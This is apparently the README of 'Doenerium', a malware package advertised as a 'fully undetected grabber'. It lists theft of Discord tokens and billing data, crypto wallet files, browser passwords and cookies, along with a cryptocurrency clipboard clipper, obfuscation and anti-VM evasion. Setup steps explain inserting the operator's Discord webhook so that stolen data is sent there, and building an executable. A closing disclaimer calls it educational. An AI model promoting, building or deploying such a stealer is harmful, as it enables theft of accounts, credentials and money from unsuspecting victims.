Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)
Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)
- Discord Token
- Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
- Discord Friends with rare badges
- Grabs crypto wallets
- Zcash
- Armory
- Bytecoin
- Jaxx
- Exodus
- Ethereum
- Electrum
- AtomicWallet
- Guarda
- Coinomi
- Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
- Screenshot(s)
- Injects itself to discord to grab token when changed
- Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
- Ultra Obfuscation (use
- Anti-Debug
- Anti-VM
- Validates a found discord token and then sends it to your discord webhook
- Sends all files to your discord webhook in beautiful embeds and a structured zip filE
Setting Up
Install Node.js
Install Visual studio with C++ compilers and all enabled (is a bit gigs but u wont have errors)
Run install.bat file to install all necessary files
Replace WEBHOOK with your webhook in config.js
Run build.bat and wait for doenerium-win.exe to be built.
Exodus wallet injection (get the password whenever the user logs in the wallet)- More grabbers (VPN's, Gaming, Messengers)
- Keylogger
- Growtopia stealer
- Discord bot to build within discord ($build <webhook_url>)
- Dynamic encryption
By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see commonsclause
There is no official telegram server of this project. I don't own
I am not responsible for any damages this software may cause. This was made for personal education.
Credits to Pandoric / PandoricGalaxy for creating this beautiful README file